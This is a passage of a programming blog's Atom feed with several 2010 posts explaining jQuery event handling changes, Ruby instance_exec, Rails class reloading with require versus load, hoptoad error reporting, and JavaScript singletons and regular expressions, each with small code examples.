      <updated>2010-10-25T12:00:00+00:00</updated>
      <id>https://www.bigbinary.com/blog/return-false-in-jquery-1.4.3</id>
      <content type="html"><![CDATA[<p>jQuery 1.4.3 was recently <a href="http://blog.jquery.com/2010/10/16/jquery-143-released/">released</a>. If you upgrade to jQuery 1.4.3 you will notice that the behavior of <code>return false</code> has changed in this version. First let's see what <code>return false</code> does.</p><h2>return false</h2><pre><code class="language-javascript">$(&quot;a&quot;).click(function () {
  console.log(&quot;clicked&quot;);
  return false;
});</code></pre><p>First ensure that the above code is executed on domready. Now if I click on any link then two things will happen.</p><pre><code class="language-plaintext">e.preventDefault() will be called.
e.stopPropagation() will be called.</code></pre><h2>e.preventDefault()</h2><p>As the name suggests, calling <code>e.preventDefault()</code> will make sure that the default behavior is not executed.</p><pre><code class="language-plaintext">&lt;a href='www.google.com'&gt;click me&lt;/a&gt;</code></pre><p>If the above link is clicked then the default behavior of the browser is to take you to <code>www.google.com</code>. However by invoking <code>e.preventDefault()</code> the browser will not go ahead with the default behavior and I will <strong>not</strong> be taken to <code>www.google.com</code>.</p><h2>e.stopPropagation</h2><p>When a link is clicked then an event, a &quot;click event&quot;, is created. And this event bubbles all the way up to the top. By invoking <code>e.stopPropagation</code> I am asking the browser not to propagate the event. In other words the event will stop bubbling.</p><pre><code class="language-html">&lt;div class=&quot;first&quot;&gt;
  &lt;div class=&quot;two&quot;&gt;
    &lt;a href=&quot;www.google.com&quot;&gt;click me&lt;/a&gt;
  &lt;/div&gt;
&lt;/div&gt;</code></pre><p>If I click on &quot;click me&quot; then the &quot;click event&quot; will start bubbling.
Now let's say that I catch this event at <code>.two</code> and I call <code>e.stopPropagation()</code>; then this event will never reach <code>.first</code>.</p><h2>e.stopImmediatePropagation</h2><p>First note that you can bind more than one event handler to an element. Take a look at the following case.</p><pre><code class="language-html">&lt;a class=&quot;one&quot;&gt;one&lt;/a&gt;</code></pre><p>I am going to bind three click handlers to the above element.</p><pre><code class="language-javascript">$(&quot;a&quot;).bind(&quot;click&quot;, function (e) {
  console.log(&quot;first&quot;);
});
$(&quot;a&quot;).bind(&quot;click&quot;, function (e) {
  console.log(&quot;second&quot;);
  e.stopImmediatePropagation();
});
$(&quot;a&quot;).bind(&quot;click&quot;, function (e) {
  console.log(&quot;third&quot;);
});</code></pre><p>In this case there are three handlers bound to the same element. Notice that the second handler invokes <code>e.stopImmediatePropagation()</code>. Calling <code>e.stopImmediatePropagation</code> does two things.</p><p>Just like <code>stopPropagation</code> it will stop the bubbling of the event. So any parent of this element will not get this event.</p><p>However <code>stopImmediatePropagation</code> also stops the event from reaching the remaining handlers bound to the same element. It kills the event right then and there. That's it. End of the event.</p><p>Once again, calling <code>stopPropagation</code> means stop this event from going to the parent.
And calling <code>stopImmediatePropagation</code> means stop passing this event to the other event handlers bound to the element itself.</p><p>If you are interested, <a href="http://www.w3.org/TR/2006/WD-DOM-Level-3-Events-20060413/events.html#Events-Event-stopImmediatePropagation">here is a link to</a> the DOM Level 3 Events spec.</p><h2>Back to original problem</h2><p>Now that I have described what <code>preventDefault</code>, <code>stopPropagation</code> and <code>stopImmediatePropagation</code> do, let's see what changed in jQuery 1.4.3.</p><p>In jQuery 1.4.2, executing &quot;return false&quot; was the same as executing:</p><pre><code class="language-javascript">e.preventDefault();
e.stopPropagation();
e.stopImmediatePropagation();</code></pre><p>Now <code>e.stopImmediatePropagation</code> internally calls <code>e.stopPropagation</code>, but I have added it here for visual clarity.</p><p>The fact that <code>return false</code> was calling <code>e.stopImmediatePropagation</code> was a bug. Get that. It was a bug, which got fixed in jQuery 1.4.3.</p><p>So in jQuery 1.4.3 <code>e.stopImmediatePropagation</code> is not called. Check out this piece of code from <code>events.js</code> of the jQuery code base.</p><pre><code class="language-javascript">if (ret !== undefined) {
  event.result = ret;
  if (ret === false) {
    event.preventDefault();
    event.stopPropagation();
  }
}</code></pre><p>As you can see, when <code>return false</code> is invoked then <code>e.stopImmediatePropagation</code> is <strong>not</strong> called.</p><h2>It gets complicated with live and a bug in jQuery 1.4.3</h2><p>To make the case complicated, jQuery 1.4.3 has a bug in which <code>e.stopImmediatePropagation</code> does not work.
Here is <a href="http://forum.jquery.com/topic/e-stopimmedidatepropagation-does-not-work-with-live-or-with-delegate">a link to this bug</a> I reported.</p><p>To understand the bug take a look at the following code:</p><pre><code class="language-plaintext">&lt;a href='' class='first'&gt;click me&lt;/a&gt;

$('a.first').live('click', function(e){
    alert('hello');
    e.preventDefault();
    e.stopImmediatePropagation();
});
$('a.first').live('click', function(){
    alert('world');
});</code></pre><p>Since I am invoking <code>e.stopImmediatePropagation</code> I should never see the <code>alert world</code>. However you will see that alert if you are using jQuery 1.4.3. You can play with it <a href="http://jsbin.com/ujipi4/3#html">here</a>.</p><p>This bug has been fixed as per <a href="http://github.com/jquery/jquery/commit/974b5aeab7a3788ff5fb9db87b9567784e0249fc">this commit</a>. Note that the commit mentioned was done after the release of jQuery 1.4.3. To get the fix you will have to wait for the jQuery 1.4.4 release or use jQuery edge.</p><h2>I am using rails.js (jquery-ujs). What do I do?</h2><p>As I have shown, &quot;return false&quot; does not work the same way in jQuery 1.4.3. However I would like to have as much backward compatibility in <code>jquery-ujs</code> as possible, so that the same code base works with jQuery 1.4 through 1.4.3, since not everyone upgrades immediately.</p><p><a href="http://github.com/rails/jquery-ujs/commit/f991faf0074487b43a061168cdbfd102ee0c182c">This commit</a> should make <code>jquery-ujs</code> jQuery 1.4.3 compatible. <a href="http://github.com/rails/jquery-ujs/issues">Many issues</a> have been logged at jquery-ujs and I will take a look at all of them one by one. Please do provide your feedback.</p>]]></content>
    </entry><entry>
       <title><![CDATA[instance_exec , changing self and params]]></title>
       <author><name>Neeraj Singh</name></author>
      <link href="https://www.bigbinary.com/blog/instance-exec-changing-self-and-parameters-to-proc"/>
      <updated>2010-05-28T12:00:00+00:00</updated>
      <id>https://www.bigbinary.com/blog/instance-exec-changing-self-and-parameters-to-proc</id>
      <content type="html"><![CDATA[<p><em>Here is an <a href="understanding-instance-exec-in-ruby">updated article on the same topic</a>.</em></p><p>The following code will print <code>99</code> as the output.</p><pre><code class="language-ruby">class Klass
  def initialize
    @secret = 99
  end
end

puts Klass.new.instance_eval { @secret }</code></pre><p>Nothing great there. However, try passing a parameter to <code>instance_eval</code>.</p><pre><code class="language-ruby">puts Klass.new.instance_eval(self) { @secret }</code></pre><p>You will get the following error.</p><pre><code class="language-ruby">wrong number of arguments (1 for 0)</code></pre><p>So <code>instance_eval</code> does not allow you to pass parameters to a block.</p><h2>How to get around the restriction that instance_eval does not accept parameters</h2><p><code>instance_exec</code> was added to ruby 1.9 and it allows you to pass parameters to a proc. This feature has been backported to ruby 1.8.7, so we don't really need ruby 1.9 to test this feature. Try this.</p><pre><code class="language-ruby">class Klass
  def initialize
    @secret = 99
  end
end

puts Klass.new.instance_exec('secret') { |t| eval &quot;@#{t}&quot; }</code></pre><p>The above code works. So now we can pass parameters to the block. Good.</p><h2>Changing the value of self</h2><p>Another feature of <code>instance_exec</code> is that it changes the value of <code>self</code>. To illustrate that I need to give a longer example.</p><pre><code class="language-ruby">module Kernel
  def singleton_class
    class &lt;&lt; self
      self
    end
  end
end

class Human
  proc = lambda { puts 'proc says my class is ' + self.name.to_s }
  singleton_class.instance_eval do
    define_method(:lab) do
      proc.call
    end
  end
end

class Developer &lt; Human
end

Human.lab # class is Human
Developer.lab # class is Human ; oops</code></pre><p>Notice that in the above case <code>Developer.lab</code> says &quot;Human&quot;. And that is the right answer from a Ruby perspective.
However that is not what I intended. Ruby stores the binding of the proc in the context it was created in, and hence it rightly reports that self is &quot;Human&quot; even though it is being called by <code>Developer</code>.</p><p>Go to <a href="http://facets.rubyforge.org/apidoc/api/core/index.html">http://facets.rubyforge.org/apidoc/api/core/index.html</a> and look for the <code>instance_exec</code> method. The doc says</p><blockquote><p>Evaluate the block with the given arguments within the context of this object, so self is set to the method receiver.</p></blockquote><p>It means that <code>instance_exec</code> evaluates self in a new context. Now try the same code with <code>instance_exec</code>.</p><pre><code class="language-ruby">module Kernel
  def singleton_class
    class &lt;&lt; self
      self
    end
  end
end

class Human
  proc = lambda { puts 'proc says my class is ' + self.name.to_s }
  singleton_class.instance_eval do
    define_method(:lab) do
      self.instance_exec &amp;proc
    end
  end
end

class Developer &lt; Human
end

Human.lab # class is Human
Developer.lab # class is Developer</code></pre><p>In this case <code>Developer.lab</code> says <code>Developer</code> and not <code>Human</code>.</p><p>You can also check out this page (link is not available) which has a much more detailed explanation of <code>instance_exec</code> and also emphasizes that <code>instance_exec</code> does pass a new value of <code>self</code>.</p><p><code>instance_exec</code> is so useful that <code>ActiveSupport</code> needs it. And since ruby 1.8.6 does not have it, <code>ActiveSupport</code> has code to support it.</p><p>I came across the <code>instance_exec</code> issue while resolving <a href="https://rails.lighthouseapp.com/projects/8994/tickets/4507">rails ticket #4507</a>. The final solution did not need <code>instance_exec</code> but I learned a bit about it.</p>]]></content>
    </entry><entry>
       <title><![CDATA[$LOADED_FEATURES and require, load, require_dependency]]></title>
       <author><name>Neeraj Singh</name></author>
      <link href="https://www.bigbinary.com/blog/require-load-loaded_features"/>
      <updated>2010-05-12T12:00:00+00:00</updated>
      <id>https://www.bigbinary.com/blog/require-load-loaded_features</id>
      <content type="html"><![CDATA[<p>Rails developers know that in development mode classes are loaded on demand. In production mode all the classes are loaded as part of bootstrapping the system. Also, in development mode classes are reloaded every single time a page is refreshed.</p><p>In order to reload a class, Rails first has to <code>unload</code> it. That unloading is done something like this.</p><pre><code class="language-ruby"># unload User class
Object.send(:remove_const, :User)</code></pre><p>However a class might have other constants and they need to be unloaded too. Before you unload those constants you need to know all the constants that are defined in the class that is being unloaded. Long story short, Rails keeps track of every single constant that is loaded when it loads <code>User</code> or <code>UserController</code>.</p><h2>Dependency mechanism is not perfect</h2><p>Sometimes the dependency mechanism in Rails lets a few things fall through the cracks. Try the following case.</p><pre><code class="language-ruby">require 'open-uri'

class UsersController &lt; ApplicationController
  def index
    open(&quot;http://www.ruby-lang.org/&quot;) {|f| }
    render :text =&gt; 'hello'
  end
end</code></pre><p>Start the server in development mode and visit <code>http://localhost:3000/users</code>. The first time everything will come up fine. Now refresh the page. This time you should get an exception: <code>uninitialized constant OpenURI</code>.</p><p>So what's going on?</p><p>After the page is served the very first time, at the end of the response Rails will unload all the constants that were autoloaded, including <code>UsersController</code>. However while unloading <code>UsersController</code> Rails will also unload <code>OpenURI</code>.</p><p>When the page is refreshed then <code>UsersController</code> will be loaded and <code>require 'open-uri'</code> will be called.
However, that require will return <code>false</code>.</p><h2>Why require returns false</h2><p>Try the following test case in irb.</p><p>step 1</p><pre><code class="language-ruby">irb(main):002:0&gt; require 'ostruct'
=&gt; true</code></pre><p>step 2</p><pre><code class="language-ruby">irb(main):005:0* Object.send(:remove_const, :OpenStruct)
=&gt; OpenStruct</code></pre><p>step 3 : ensure that OpenStruct is truly removed</p><pre><code class="language-ruby">irb(main):006:0&gt; Object.send(:remove_const, :OpenStruct)
NameError: constant Object::OpenStruct not defined
        from (irb):6:in `remove_const'
        from (irb):6:in `send'
        from (irb):6</code></pre><p>step 4</p><pre><code class="language-ruby">irb(main):007:0&gt; require 'ostruct'
=&gt; false</code></pre><p>step 5</p><pre><code class="language-ruby">irb(main):009:0&gt; OpenStruct.new
NameError: uninitialized constant OpenStruct
        from (irb):9</code></pre><p>Notice that in the above case, in step 4, require returns <code>false</code>. <code>require</code> checks against <code>$LOADED_FEATURES</code>. When <code>OpenStruct</code> was removed it was not removed from <code>$LOADED_FEATURES</code>, and hence ruby thought <code>ostruct</code> was already loaded.</p><p>How do we get around this issue?</p><p><code>require</code> loads only once. However <code>load</code> loads every single time. Instead of <code>require</code>, <code>load</code> could be used in this case.</p><pre><code class="language-ruby">irb(main):001:0&gt; load 'ostruct.rb'
=&gt; true
irb(main):002:0&gt; OpenStruct.new
=&gt; #&lt;OpenStruct&gt;</code></pre><h2>Back to the original problem</h2><p>In our rails application the refresh of the page is failing. To get around that issue use <code>require_dependency</code> instead of <code>require</code>. <code>require_dependency</code> is a Rails thing. Under the hood Rails does the same trick we did in the previous step: Rails calls <code>Kernel#load</code> to load the constants that would fail if require were used.</p>]]></content>
    </entry><entry>
       <title><![CDATA[I am not seeing hoptoad messages. Now I know why.]]></title>
       <author><name>Neeraj Singh</name></author>
      <link href="https://www.bigbinary.com/blog/I-am-not-seeing-hoptoad-messages"/>
      <updated>2010-04-23T12:00:00+00:00</updated>
      <id>https://www.bigbinary.com/blog/I-am-not-seeing-hoptoad-messages</id>
      <content type="html"><![CDATA[<p><em>The following code has been tested with Rails 2.3.5.</em></p><p>Everyone knows for sure that the hoptoad notifier sends exception messages to the server in the <em>production</em> environment. Between 'development' and 'production' there could be a number of environments. Some of these would have settings closer to the 'development' environment and some would have settings closely matching the settings of the 'production' environment.</p><p>When you have many environments and an exception occurs, one is not really sure if that message is getting logged at hoptoad or not. Here is a rundown of which messages will get logged and why.</p><h3>It all starts with Rails</h3><p>When an exception occurs while rendering a page then <code>action_controller</code> catches the exception. The following logic is evaluated to decide if the user should see an error page with a full stack trace or a 'we are sorry something went wrong' message.</p><pre><code class="language-ruby">if consider_all_requests_local || local_request?
  rescue_action_locally(exception)
else
  rescue_action_in_public(exception)
end</code></pre><p>Let's look at the first part, <code>consider_all_requests_local</code>. Open <code>~/config/environments/development.rb</code> and <code>~/config/environments/production.rb</code>.</p><pre><code class="language-ruby"># ~/config/environments/development.rb
config.action_controller.consider_all_requests_local = true

# ~/config/environments/production.rb
config.action_controller.consider_all_requests_local = false</code></pre><p>As you can see, in development mode all requests are local.
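Putting the two checks together, the decision can be condensed into a small sketch. This is plain Ruby with simplified names; `show_full_stack_trace?` is invented for this illustration, and the 127.0.0.1 comparison mirrors Rails' `local_request?`:

```ruby
LOCALHOST = '127.0.0.1'

# Simplified sketch of how Rails 2.3 picks the error page:
# a full stack trace is shown when either check passes.
def show_full_stack_trace?(consider_all_requests_local, remote_addr, remote_ip)
  local_request = (remote_addr == LOCALHOST && remote_ip == LOCALHOST)
  consider_all_requests_local || local_request
end

show_full_stack_trace?(false, '127.0.0.1', '127.0.0.1')     # local request -> true
show_full_stack_trace?(false, '203.0.113.9', '203.0.113.9') # public request -> false
```

Only when both checks fail does the request fall through to rescue_action_in_public, which is where hoptoad hooks in.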
Be careful with what you put in your intermediary environments.</p><p>If you want to override that value then you can do it like this.</p><pre><code class="language-ruby"># ~/app/controllers/application_controller.rb
ActionController::Base.consider_all_requests_local = true</code></pre><p>The second part of the equation was <code>local_request?</code>.</p><p>Rails has the following code for that method.</p><pre><code class="language-ruby">LOCALHOST = '127.0.0.1'.freeze

def local_request?
  request.remote_addr == LOCALHOST &amp;&amp; request.remote_ip == LOCALHOST
end</code></pre><p>As you can see, all requests coming from <code>127.0.0.1</code> are considered local even if RAILS_ENV is 'production'. For testing purposes you can override this value like this.</p><pre><code class="language-ruby"># ~/app/controllers/application_controller.rb
def local_request?
  false
end</code></pre><h2>Hoptoad has access to the exception, now what</h2><p>If <code>consider_all_requests_local</code> is false and the request is not local, then hoptoad will get access to the exception thanks to <code>alias_method_chain</code>.</p><pre><code class="language-ruby">def self.included(base)
  base.send(:alias_method, :rescue_action_in_public_without_hoptoad, :rescue_action_in_public)
  base.send(:alias_method, :rescue_action_in_public, :rescue_action_in_public_with_hoptoad)
end</code></pre><p>In <code>rescue_action_in_public_with_hoptoad</code> there is a call to <code>notify_or_ignore</code> like this.</p><pre><code class="language-ruby">unless hoptoad_ignore_user_agent?
  HoptoadNotifier.notify_or_ignore(exception, hoptoad_request_data)
end</code></pre><p>For the majority of us there is no special handling for a particular <code>user_agent</code>.</p><pre><code class="language-ruby">def notify_or_ignore(exception, opts = {})
  notice = build_notice_for(exception, opts)
  send_notice(notice) unless notice.ignore?
end</code></pre><p>Hoptoad treats the following exceptions as ignorable by default, and you won't get notifications for these types of exceptions.</p><pre><code class="language-ruby">IGNORE_DEFAULT = ['ActiveRecord::RecordNotFound',
                  'ActionController::RoutingError',
                  'ActionController::InvalidAuthenticityToken',
                  'CGI::Session::CookieStore::TamperedWithCookie',
                  'ActionController::UnknownAction']</code></pre><p>The next hop is the method <code>send_notice</code>.</p><pre><code class="language-ruby">def send_notice(notice)
  if configuration.public?
    sender.send_to_hoptoad(notice.to_xml)
  end
end</code></pre><p><code>configuration.public?</code> is defined like this.</p><pre><code class="language-ruby">@development_environments = %w(development test cucumber)

def public?
  !development_environments.include?(environment_name)
end</code></pre><p>As you can see, if <code>Rails.env</code> is <code>development</code>, <code>test</code> or <code>cucumber</code>, the exception will not be reported to the hoptoad server.</p>]]></content>
    </entry><entry>
       <title><![CDATA[List of only the elements that contain]]></title>
       <author><name>Neeraj Singh</name></author>
      <link href="https://www.bigbinary.com/blog/list-of-only-the-elements"/>
      <updated>2010-04-12T12:00:00+00:00</updated>
      <id>https://www.bigbinary.com/blog/list-of-only-the-elements</id>
      <content type="html"><![CDATA[<p>I was toying with the <a href="http://kilianvalkhof.com/2010/javascript/how-to-build-a-fast-simple-list-filter-with-jquery">simple list filter plugin</a> and ended up with this markup.</p><pre><code class="language-html">&lt;div id=&quot;lab&quot;&gt;
  &lt;ul id=&quot;list&quot;&gt;
    &lt;li&gt;&lt;a href=&quot;&quot;&gt;USA&lt;/a&gt;&lt;/li&gt;
  &lt;ul&gt;
  &lt;p&gt;
    &lt;a href=''&gt;USA&lt;/a&gt;
  &lt;/p&gt;
&lt;/div&gt;</code></pre><p>I want to get all links that contain the word <code>USA</code>. Simple enough. jQuery supports the <code>contains</code> selector.</p><pre><code class="language-javascript">$(&quot;:contains('USA')&quot;);</code></pre><p>The above query results in the following items.</p><pre><code class="language-plaintext">[html, body#body, div#lab, ul#list, li, a, ul, p, a]</code></pre><p>That is because <a href="http://api.jquery.com/contains-selector">contains</a> looks for the given string under all the descendants.</p><h2>has method to the rescue</h2><p>jQuery's <a href="http://api.jquery.com/has">has</a> method returns the list of elements which have a descendant containing the given string.</p><pre><code class="language-javascript">b = $(&quot;*&quot;).has(&quot;:contains('USA')&quot;);</code></pre><p>The above query results in the following items.</p><pre><code class="language-plaintext">[html, body#body, div#lab, ul#list, li, ul, p]</code></pre><h2>Final result</h2><pre><code class="language-javascript">a = $(&quot;:contains('USA')&quot;);
b = $(&quot;*&quot;).has(&quot;:contains('USA')&quot;);
c = a.not(b);
console.log(c);</code></pre><p>The above query results in the following items.</p><pre><code class="language-plaintext">[a, a]</code></pre>]]></content>
    </entry><entry>
       <title><![CDATA[Singleton function in JavaScript]]></title>
       <author><name>Neeraj Singh</name></author>
      <link href="https://www.bigbinary.com/blog/singleton-function-in-javascript"/>
      <updated>2010-04-11T12:00:00+00:00</updated>
      <id>https://www.bigbinary.com/blog/singleton-function-in-javascript</id>
      <content type="html"><![CDATA[<p>Recently I was discussing with a friend how to create a singleton function in JavaScript. I am putting the same information here in case it might help someone understand JavaScript better.</p><h2>Creating an Object</h2><p>The simplest solution is creating an instance of the object.</p><pre><code class="language-javascript">var Logger = function (path) {
  this.path = path;
};

l1 = new Logger(&quot;/home&quot;);
console.log(l1);
l2 = new Logger(&quot;/dev&quot;);
console.log(l2);
console.log(l1 === l2);</code></pre><p>The above solution works. However <code>l2</code> is a new instance of <code>Logger</code>.</p><h2>Singleton solution using a global variable</h2><pre><code class="language-javascript">window.global_logger = null;

var Logger = function (path) {
  if (global_logger) {
    console.log(&quot;global logger already present&quot;);
  } else {
    this.path = path;
    window.global_logger = this;
  }
  return window.global_logger;
};

l1 = new Logger(&quot;/home&quot;);
console.log(l1);
l2 = new Logger(&quot;/dev&quot;);
console.log(l2);
console.log(l1 === l2);</code></pre><p>The above solution works. However it relies on creating a global variable. To the extent possible, it is best to avoid polluting the global namespace.</p><h2>Singleton solution without polluting the global namespace</h2><pre><code class="language-javascript">var Logger = (function () {
  var _instance;
  return function (path) {
    if (_instance) {
      console.log(&quot;an instance is already present&quot;);
    } else {
      this.path = path;
      _instance = this;
    }
    return _instance;
  };
})(); // note that it is a self-invoking function

var l1 = new Logger(&quot;/root&quot;);
console.log(l1);
var l2 = new Logger(&quot;/dev&quot;);
console.log(l2);
console.log(l1 === l2);</code></pre><p>This solution does not pollute the global namespace.</p>]]></content>
    </entry><entry>
       <title><![CDATA[Regular expression in JavaScript]]></title>
       <author><name>Neeraj Singh</name></author>
      <link href="https://www.bigbinary.com/blog/regular-expressions-in-JavaScript"/>
      <updated>2010-03-31T12:00:00+00:00</updated>
      <id>https://www.bigbinary.com/blog/regular-expressions-in-JavaScript</id>
      <content type="html"><![CDATA[<p>Regular expressions are a powerful tool in any language. Here I am discussing how to use regular expressions in JavaScript.</p><h2>Defining regular expressions</h2><p>In JavaScript a regular expression can be defined in two ways.</p><pre><code class="language-javascript">var regex = /hello/gi; // i is for ignore case. g is for global.
var regex = new RegExp(&quot;hello&quot;, &quot;ig&quot;);</code></pre><p>If I am defining a regular expression using <a href="https://developer.mozilla.org/en/Core_JavaScript_1.5_Reference/Global_Objects/RegExp#Properties_2">RegExp</a> then I need to add an escape character in certain cases.</p><pre><code class="language-javascript">var regex = /hello_\w*/gi;
var regex = new RegExp(&quot;hello_\\w*&quot;, &quot;ig&quot;); // notice the extra backslash before \w</code></pre><p>When I am defining a regular expression using RegExp, the backslash in <code>\w</code> needs to be escaped, otherwise it would be taken literally.</p><h2>test method</h2><p>The <a href="https://developer.mozilla.org/en/Core_JavaScript_1.5_Reference/Global_Objects/RegExp/test">test method</a> checks if a match is found or not. This method returns true or false.</p><pre><code class="language-javascript">var regex = /hello/gi;
var text = &quot;hello_you&quot;;
var bool = regex.test(text);</code></pre><h2>exec method</h2><p>The <a href="https://developer.mozilla.org/en/Core_JavaScript_1.5_Reference/Global_Objects/RegExp/exec">exec method</a> also finds whether a match exists. It returns an array if a match is found. Otherwise it returns null.</p><pre><code class="language-javascript">var regex = /hello_\w*/gi;
var text = &quot;hello_you&quot;;
var matches = regex.exec(text);
console.log(matches); //=&gt; ['hello_you']</code></pre><h2>match method</h2><p>The <a href="https://developer.mozilla.org/en/Core_JavaScript_1.5_Reference/Global_Objects/String/match">match method</a> acts exactly like the exec method if no <code>g</code> parameter is passed. 
When the global flag is turned on, match returns an array containing all the matches.</p><p>Note that for <code>exec</code> the syntax was <code>regex.exec(text)</code> while for the <code>match</code> method the syntax is <code>text.match(regex)</code>.</p><pre><code class="language-javascript">var regex = /hello_\w*/i;
var text = &quot;hello_you and hello_me&quot;;
var matches = text.match(regex);
console.log(matches); //=&gt; ['hello_you']</code></pre><p>Now with the global flag turned on.</p><pre><code class="language-javascript">var regex = /hello_\w*/gi;
var text = &quot;hello_you and hello_me&quot;;
var matches = text.match(regex);
console.log(matches); //=&gt; ['hello_you', 'hello_me']</code></pre><h2>Getting multiple matches</h2><p>Once again, both the <code>exec</code> and <code>match</code> methods without the <code>g</code> option do not get all the matching values from a string. If you want all the matching values then you need to iterate through the text. Here is an example.</p><p>Get both the bug numbers in the following case.</p><pre><code class="language-javascript">var matches = [];
var regex = /#(\d+)/gi;
var text = &quot;I fixed bugs #1234 and #5678&quot;;
while ((match = regex.exec(text))) {
  matches.push(match[1]);
}
console.log(matches); // ['1234', '5678']</code></pre><p>Note the global flag <code>g</code> in the above case. Without it, the above code will run forever.</p><pre><code class="language-javascript">var matches = [];
var regex = /#(\d+)/gi;
var text = &quot;I fixed bugs #1234 and #5678&quot;;
matches = text.match(regex);
console.log(matches);</code></pre><p>In the above case <code>match</code> is used instead of <code>exec</code>. However, since match with the global flag brings back all the matches, there was no need to iterate in a loop.</p><h2>match attributes</h2><p>When a match is made, an array is returned. 
That array has two additional properties.</p><ul><li>index: tells where in the string the match was found</li><li>input: the original string</li></ul><pre><code class="language-javascript">var regex = /#(\d+)/i;
var text = &quot;I fixed bugs #1234 and #5678&quot;;
var match = text.match(regex);
console.log(match.index); // 13
console.log(match.input); // I fixed bugs #1234 and #5678</code></pre><h2>replace</h2><p>The <a href="https://developer.mozilla.org/en/Core_JavaScript_1.5_Reference/Global_Objects/String/replace">replace method</a> accepts either a regexp or a string as its first argument.</p><pre><code class="language-javascript">var text = &quot;I fixed bugs #1234 and #5678&quot;;
var output = text.replace(&quot;bugs&quot;, &quot;defects&quot;);
console.log(output); // I fixed defects #1234 and #5678</code></pre><p>An example of using a function to replace text.</p><pre><code class="language-javascript">var text = &quot;I fixed bugs #1234 and #5678&quot;;
var output = text.replace(/\d+/g, function (match) {
  return match * 2;
});
console.log(output); // I fixed bugs #2468 and #11356</code></pre><p>Another case.</p><pre><code class="language-javascript">// requirement is to change all like within &lt;b&gt; &lt;/b&gt; to love.
var text = &quot; I like JavaScript. &lt;b&gt; I like JavaScript&lt;/b&gt; &quot;;
var output = text.replace(/&lt;b&gt;.*?&lt;\/b&gt;/g, function (match) {
  return match.replace(/like/g, &quot;love&quot;);
});
console.log(output); // I like JavaScript. 
&lt;b&gt; I love JavaScript&lt;/b&gt;</code></pre><p>Example of using special variables.</p><pre><code class="language-plaintext">$&amp; - the matched substring.
$` - the portion of the string that precedes the matched substring.
$' - the portion of the string that follows the matched substring.
$n - $1, $2 etc., where the number refers to the captured group.</code></pre><pre><code class="language-javascript">var regex = /(\w+)\s(\w+)/;
var text = &quot;John Smith&quot;;
var output = text.replace(regex, &quot;$2, $1&quot;);
console.log(output); // Smith, John</code></pre><pre><code class="language-javascript">var regex = /JavaScript/;
var text = &quot;I think JavaScript is awesome&quot;;
var output = text.replace(regex, &quot;before:$` after:$' full:$&amp;&quot;);
console.log(output); // I think before:I think  after: is awesome full:JavaScript is awesome</code></pre><p>The replace method also accepts captured groups as parameters in the function. Here is an example:</p><pre><code class="language-javascript">var regex = /#(\d*)(.*)@(\w*)/;
var text = &quot;I fixed bug #1234 and twitted to @javascript&quot;;
text.replace(regex, function (_, a, b, c) {
  console.log(_); // #1234 and twitted to @javascript
  console.log(a); // 1234
  console.log(b); //  and twitted to 
  console.log(c); // javascript
});</code></pre><p>As you can see, the very first argument to the function is the fully matched text. Other captured groups are subsequent arguments. 
This strategy can also be used to collect all the matches.</p><pre><code class="language-javascript">var bugs = [];
var regex = /#(\d+)/g;
var text = &quot;I fixed bugs #1234 and #5678&quot;;
text.replace(regex, function (_, f) {
  bugs.push(f);
});
console.log(bugs); // [&quot;1234&quot;, &quot;5678&quot;]</code></pre><h2>Split method</h2><p>The <a href="https://developer.mozilla.org/en/Core_JavaScript_1.5_Reference/Global_Objects/String/split">split method</a> can take either a string or a regular expression.</p><p>An example of split using a string.</p><pre><code class="language-javascript">var text = &quot;Jan,Feb,Mar,Apr,May,Jun,Jul,Aug,Sep,Oct,Nov,Dec&quot;;
var output = text.split(&quot;,&quot;);
console.log(output); // [&quot;Jan&quot;, &quot;Feb&quot;, &quot;Mar&quot;, &quot;Apr&quot;, &quot;May&quot;, &quot;Jun&quot;, &quot;Jul&quot;, &quot;Aug&quot;, &quot;Sep&quot;, &quot;Oct&quot;, &quot;Nov&quot;, &quot;Dec&quot;]</code></pre><p>An example of split using a regular expression.</p><pre><code class="language-javascript">var text = &quot;Harry Trump ;Fred Barney; Helen Rigby ; Bill Abel ;Chris Hand &quot;;
var regex = /\s*;\s*/;
var output = text.split(regex);
console.log(output); // [&quot;Harry Trump&quot;, &quot;Fred Barney&quot;, &quot;Helen Rigby&quot;, &quot;Bill Abel&quot;, &quot;Chris Hand &quot;]</code></pre><h2>Non-capturing group</h2><p>The requirement given to me states that I should strictly look for the words <code>java</code>, <code>ruby</code> or <code>rails</code> within word boundaries. This can be done like this.</p><pre><code class="language-javascript">var text = &quot;java&quot;;
var regex = /\bjava\b|\bruby\b|\brails\b/;
text.match(regex);</code></pre><p>The above code works. However, notice the code duplication. This can be refactored to the one given below.</p><pre><code class="language-javascript">var text = &quot;rails&quot;;
var regex = /\b(java|ruby|rails)\b/;
text.match(regex);</code></pre><p>The above code works and there is no code duplication. 
However, in this case I am asking the regular expression engine to create a captured group which I'll not be using. Regex engines need to do extra work to keep track of captured groups. It would be nice if I could tell the regex engine not to capture this into a group, because I will not be using it.</p><p><code>?:</code> is a special symbol that tells the regex engine to create a non-capturing group. The above code can be refactored into the one given below.</p><pre><code class="language-javascript">var text = &quot;rails&quot;;
var regex = /\b(?:java|ruby|rails)\b/;
text.match(regex);</code></pre><p>Here is another example of a non-capturing pattern, this time using a lookahead.</p><pre><code class="language-javascript">text = &quot;#container a.filter(.top).filter(.bottom).filter(.middle)&quot;;
matches = text.match(/^[^.]*|\.[^.]*(?=\))/g);
console.log(matches);</code></pre>]]></content>
    </entry><entry>
       <title><![CDATA[Get started with nodejs in steps]]></title>
       <author><name>Neeraj Singh</name></author>
      <link href="https://www.bigbinary.com/blog/getting-started-with-nodejs-in-steps"/>
      <updated>2010-03-25T12:00:00+00:00</updated>
      <id>https://www.bigbinary.com/blog/getting-started-with-nodejs-in-steps</id>
      <content type="html"><![CDATA[<p><a href="http://nodejs.org">nodejs</a> is awesome. To get people started with nodejs, <a href="http://chat.nodejs.org">node-chat</a> has been developed. Source code for the node-chat app is here (Link is not available).</p><p>When I looked at the source code for the first time, it looked intimidating. In order to get started with nodejs, I have developed a small portion of the node-chat application in 13 incremental steps.</p><p>The first step is as simple as <a href="http://github.com/neerajsingh0101/node-chat-in-steps/raw/step1/server.js">15 lines of code</a>.</p><p>If you want to follow along then go through the <a href="http://github.com/neerajsingh0101/node-chat-in-steps">README</a> and you can get a feel of nodejs very quickly. How to check out each step and other information is mentioned in the README.</p><p>Enjoy nodejs.</p>]]></content>
    </entry><entry>
       <title><![CDATA[Two ways of declaring functions]]></title>
       <author><name>Neeraj Singh</name></author>
      <link href="https://www.bigbinary.com/blog/two-ways-of-declaring-functions"/>
